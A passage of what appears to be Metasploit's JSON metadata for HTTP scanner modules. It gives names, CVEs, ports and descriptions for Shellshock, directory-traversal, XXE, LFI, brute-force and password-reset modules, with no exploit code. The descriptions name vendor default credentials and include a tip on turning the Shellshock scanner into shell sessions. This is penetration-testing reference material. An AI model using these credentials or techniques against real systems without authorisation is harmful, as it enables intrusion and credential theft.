8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/advantech_webaccess_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/allegro_rompager_misfortune_cookie": {
"name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner",
"full_name": "auxiliary/scanner/http/allegro_rompager_misfortune_cookie",
"rank": 300,
"disclosure_date": "2014-12-17",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Lior Oppenheim"
],
"description": "This module scans for HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"references": [
"CVE-2014-9222",
"URL-http://mis.fortunecook.ie",
"URL-http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf",
"URL-http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb",
"is_install_path": true,
"ref_name": "scanner/http/allegro_rompager_misfortune_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_activemq_source_disclosure": {
"name": "Apache ActiveMQ JSP Files Source Disclosure",
"full_name": "auxiliary/scanner/http/apache_activemq_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Veerendra G.G",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a source code disclosure in Apache ActiveMQ. The\n vulnerability is due to the Jetty's ResourceHandler handling of specially crafted\n URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1\n over Windows 2003 SP2 and Ubuntu 10.04.",
"references": [
"CVE-2010-1587",
"OSVDB-64020",
"BID-39636",
"URL-https://issues.apache.org/jira/browse/AMQ-2700"
],
"platform": "",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_activemq_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_activemq_traversal": {
"name": "Apache ActiveMQ Directory Traversal",
"full_name": "auxiliary/scanner/http/apache_activemq_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"AbdulAziz Hariri",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Apache ActiveMQ\n 5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's\n ResourceHandler installed with the affected versions. This module has been tested\n successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.",
"references": [
"OSVDB-86401",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895",
"URL-https://issues.apache.org/jira/browse/amq-2788"
],
"platform": "",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_activemq_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_mod_cgi_bash_env": {
"name": "Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner",
"full_name": "auxiliary/scanner/http/apache_mod_cgi_bash_env",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "auxiliary",
"author": [
"Stephane Chazelas",
"wvu <wvu@metasploit.com>",
"lcamtuf"
],
"description": "This module scans for the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CGI scripts in the\n Apache web server by setting the HTTP_USER_AGENT environment variable to a\n malicious function definition.\n\n PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your\n CMD, set ExitOnSession false, run -j, and then run this module to create\n sessions on vulnerable hosts.\n\n Note that this is not the recommended method for obtaining shells.\n If you require sessions, please use the apache_mod_cgi_bash_env_exec\n exploit module instead.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_mod_cgi_bash_env",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"auxiliary_scanner/http/apache_optionsbleed": {
"name": "Apache Optionsbleed Scanner",
"full_name": "auxiliary/scanner/http/apache_optionsbleed",
"rank": 300,
"disclosure_date": "2017-09-18",
"type": "auxiliary",
"author": [
"Hanno Böck",
"h00die"
],
"description": "This module scans for the Apache optionsbleed vulnerability where the Allow\n response header returned from an OPTIONS request may bleed memory if the\n server has a .htaccess file with an invalid Limit method defined.",
"references": [
"CVE-2017-9798",
"EDB-42745",
"URL-https://github.com/hannob/optionsbleed",
"URL-https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_optionsbleed",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Optionsbleed"
]
}
},
"auxiliary_scanner/http/apache_userdir_enum": {
"name": "Apache \"mod_userdir\" User Enumeration",
"full_name": "auxiliary/scanner/http/apache_userdir_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder.andrade@alligatorteam.org>"
],
"description": "Apache with the UserDir directive enabled generates different error\n codes when a username exists and there is no public_html directory and when the username\n does not exist, which could allow remote attackers to determine valid usernames on the\n server.",
"references": [
"BID-3335",
"CVE-2001-1013",
"OSVDB-637"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_userdir_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/appletv_login": {
"name": "AppleTV AirPlay Login Utility",
"full_name": "auxiliary/scanner/http/appletv_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"thelightcosine"
],
"description": "This module attempts to authenticate to an AppleTV service with\n the username, 'AirPlay'. The device has two different access control\n modes: OnScreen and Password. The difference between the two is the\n password in OnScreen mode is numeric-only and four digits long, which\n means when this option is enabled, this option, the module will make\n sure to cover all of them - from 0000 to 9999. The Password mode is\n more complex, therefore the usual online bruteforce strategies apply.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/appletv_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/appletv_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/atlassian_crowd_fileaccess": {
"name": "Atlassian Crowd XML Entity Expansion Remote File Access",
"full_name": "auxiliary/scanner/http/atlassian_crowd_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Will Caput",
"Trevor Hartman",
"Thaddeus Bogner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module simply attempts to read a remote file from the server using a\n vulnerability in the way Atlassian Crowd handles XML files. The vulnerability\n occurs while trying to expand external entities with the SYSTEM identifier. This\n module has been tested successfully on Linux and Windows installations of Crowd.",
"references": [
"CVE-2012-2926",
"OSVDB-82274",
"BID-53595",
"URL-https://www.neg9.org",
"URL-https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17"
],
"platform": "",
"arch": "",
"rport": 8095,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8095
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/atlassian_crowd_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/axis_local_file_include": {
"name": "Apache Axis2 v1.4.1 Local File Inclusion",
"full_name": "auxiliary/scanner/http/axis_local_file_include",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability.\n By loading a local XML file which contains a cleartext username and password, attackers can trivially\n recover authentication credentials to Axis services.",
"references": [
"EDB-12721",
"OSVDB-59001"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
"is_install_path": true,
"ref_name": "scanner/http/axis_local_file_include",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/axis_login": {
"name": "Apache Axis2 Brute Force Utility",
"full_name": "auxiliary/scanner/http/axis_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Leandro Oliveira <leandrofernando@gmail.com>"
],
"description": "This module attempts to login to an Apache Axis2 instance using\n username and password combinations indicated by the USER_FILE,\n PASS_FILE, and USERPASS_FILE options. It has been verified to\n work on at least versions 1.4.1 and 1.6.2.",
"references": [
"CVE-2010-0219",
"OSVDB-68662"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/axis_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/axis_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/backup_file": {
"name": "HTTP Backup File Scanner",
"full_name": "auxiliary/scanner/http/backup_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of possible copies\n of a specific file in a given path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-22 20:50:22 +0000",
"path": "/modules/auxiliary/scanner/http/backup_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/backup_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/barracuda_directory_traversal": {
"name": "Barracuda Multiple Product \"locale\" Directory Traversal",
"full_name": "auxiliary/scanner/http/barracuda_directory_traversal",
"rank": 300,
"disclosure_date": "2010-10-08",
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability present in\n several Barracuda products, including the Barracuda Spam and Virus Firewall,\n Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,\n this module will attempt to download the Barracuda configuration file.",
"references": [
"OSVDB-68301",
"URL-http://secunia.com/advisories/41609/",
"EDB-15130"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/barracuda_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bavision_cam_login": {
"name": "BAVision IP Camera Web Server Login",
"full_name": "auxiliary/scanner/http/bavision_cam_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to an IP camera created by BAVision via the\n web service. By default, the vendor ships a default credential admin:123456 to its\n cameras, and the web server does not enforce lockouts in case of a bruteforce attack.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/bavision_cam_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/binom3_login_config_pass_dump": {
"name": "Binom3 Web Management Login Scanner, Config and Password File Dump",
"full_name": "auxiliary/scanner/http/binom3_login_config_pass_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer\n management login portal(s), and attempts to identify valid credentials.\n There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'.\n In addition to device config, 'root' user can also access password file.\n Other users - admin, alg, user - can only access configuration file.\n The module attempts to download configuration and password files depending on the login user credentials found.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/binom3_login_config_pass_dump",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bitweaver_overlay_type_traversal": {
"name": "Bitweaver overlay_type Directory Traversal",
"full_name": "auxiliary/scanner/http/bitweaver_overlay_type_traversal",
"rank": 300,
"disclosure_date": "2012-10-23",
"type": "auxiliary",
"author": [
"David Aaron",
"Jonathan Claudius",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in Bitweaver.\n When handling the 'overlay_type' parameter, view_overlay.php fails to do any\n path checking/filtering, which can be abused to read any file outside the\n virtual directory.",
"references": [
"CVE-2012-5192",
"OSVDB-86599",
"EDB-22216",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/bitweaver_overlay_type_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/blind_sql_query": {
"name": "HTTP Blind SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/blind_sql_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of Blind SQL injection issues\n in GET/POST Query parameters values.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
"is_install_path": true,
"ref_name": "scanner/http/blind_sql_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bmc_trackit_passwd_reset": {
"name": "BMC TrackIt! Unauthenticated Arbitrary User Password Change",
"full_name": "auxiliary/scanner/http/bmc_trackit_passwd_reset",
"rank": 300,
"disclosure_date": "2014-12-09",
"type": "auxiliary",
"author": [
"bperry",
"jhart"
],
"description": "This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3\n and possibly prior versions. If the password reset service is configured to use\n a domain administrator (which is the recommended configuration), then domain\n credentials can be reset (such as domain Administrator).",
"references": [
"URL-http://www.zerodayinitiative.com/advisories/ZDI-14-419/",
"CVE-2014-8270"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb",
"is_install_path": true,
"ref_name": "scanner/http/bmc_trackit_passwd_reset",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/brute_dirs": {
"name": "HTTP Directory Brute Force Scanner",
"full_name": "auxiliary/scanner/http/brute_dirs",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting directories by brute forcing the name\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
"is_install_path": true,
"ref_name": "scanner/http/brute_dirs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/buffalo_login": {
"name": "Buffalo NAS Login Utility",
"full_name": "auxiliary/scanner/http/buffalo_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module simply attempts to login to a Buffalo NAS instance using a specific\n username and password. It has been confirmed to work on version 1.68",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/buffalo_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/buildmaster_login": {
"name": "Inedo BuildMaster Login Scanner",
"full_name": "auxiliary/scanner/http/buildmaster_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'\n which has the default password 'Admin'.",
"references": [
],
"platform": "",
"arch": "",
"rport": 81,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-09-15 00:18:33 +0000",
"path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/buildmaster_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/caidao_bruteforce_login": {
"name": "Chinese Caidao Backdoor Bruteforce",
"full_name": "auxiliary/scanner/http/caidao_bruteforce_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.",
"references": [
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
"URL-https://www.exploit-db.com/docs/27654.pdf",
"URL-https://www.us-cert.gov/ncas/alerts/TA15-313A",
"URL-http://blog.csdn.net/nixawk/article/details/40430329"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/caidao_bruteforce_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/canon_wireless": {
"name": "Canon Printer Wireless Configuration Disclosure",
"full_name": "auxiliary/scanner/http/canon_wireless",
"rank": 300,
"disclosure_date": "2013-06-18",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module enumerates wireless credentials from Canon printers with a web interface.\n It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,\n MX890, MX920.",
"references": [
"CVE-2013-4614",
"OSVDB-94417",
"URL-http://www.mattandreko.com/2013/06/canon-y-u-no-security.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
"is_install_path": true,
"ref_name": "scanner/http/canon_wireless",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cert": {
"name": "HTTP SSL Certificate Checker",
"full_name": "auxiliary/scanner/http/cert",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus"
],
"description": "This module will check the certificate of the specified web servers\n to ensure the subject and issuer match the supplied pattern and that the certificate\n is not expired.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cert.rb",
"is_install_path": true,
"ref_name": "scanner/http/cert",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cgit_traversal": {
"name": "cgit Directory Traversal",
"full_name": "auxiliary/scanner/http/cgit_traversal",
"rank": 300,
"disclosure_date": "2018-08-03",
"type": "auxiliary",
"author": [
"Google Project Zero",
"Dhiraj Mishra"
],
"description": "This module exploits a directory traversal vulnerability which\n exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the\n configuration flag enable-http-clone is set to 1 (default).",
"references": [
"CVE-2018-14912",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1627",
"EDB-45148"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-13 15:48:21 +0000",
"path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cgit_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chef_webui_login": {
"name": "Chef Web UI Brute Force Utility",
"full_name": "auxiliary/scanner/http/chef_webui_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to login to Chef Web UI server instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It\n will also test for the default login (admin:p@ssw0rd1).",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/chef_webui_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chromecast_webserver": {
"name": "Chromecast Web Server Scanner",
"full_name": "auxiliary/scanner/http/chromecast_webserver",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module scans for the Chromecast web server on port 8008/TCP, and\n can be used to discover devices which can be targeted by other Chromecast\n modules, such as chromecast_youtube.",
"references": [
"URL-https://www.google.com/chrome/devices/chromecast/"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:05:49 +0000",
"path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
"is_install_path": true,
"ref_name": "scanner/http/chromecast_webserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chromecast_wifi": {
"name": "Chromecast Wifi Enumeration",
"full_name": "auxiliary/scanner/http/chromecast_wifi",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module enumerates wireless access points through Chromecast.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:05:49 +0000",
"path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
"is_install_path": true,
"ref_name": "scanner/http/chromecast_wifi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_asa_asdm": {
"name": "Cisco ASA ASDM Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_asa_asdm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module scans for Cisco ASA ASDM web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_asa_asdm",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_device_manager": {
"name": "Cisco Device HTTP Device Manager Access",
"full_name": "auxiliary/scanner/http/cisco_device_manager",
"rank": 300,
"disclosure_date": "2000-10-26",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module gathers data from a Cisco device (router or switch) with the device manager\n web interface exposed. The HttpUsername and HttpPassword options can be used to specify\n authentication.",
"references": [
"BID-1846",
"CVE-2000-0945",
"OSVDB-444"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-16 14:01:49 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_device_manager",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_directory_traversal": {
"name": "Cisco ASA Directory Traversal",
"full_name": "auxiliary/scanner/http/cisco_directory_traversal",
"rank": 300,
"disclosure_date": "2018-06-06",
"type": "auxiliary",
"author": [
"Michał Bentkowski",
"Yassine Aboukir",
"Shelby Pace"
],
"description": "This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.\n It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.",
"references": [
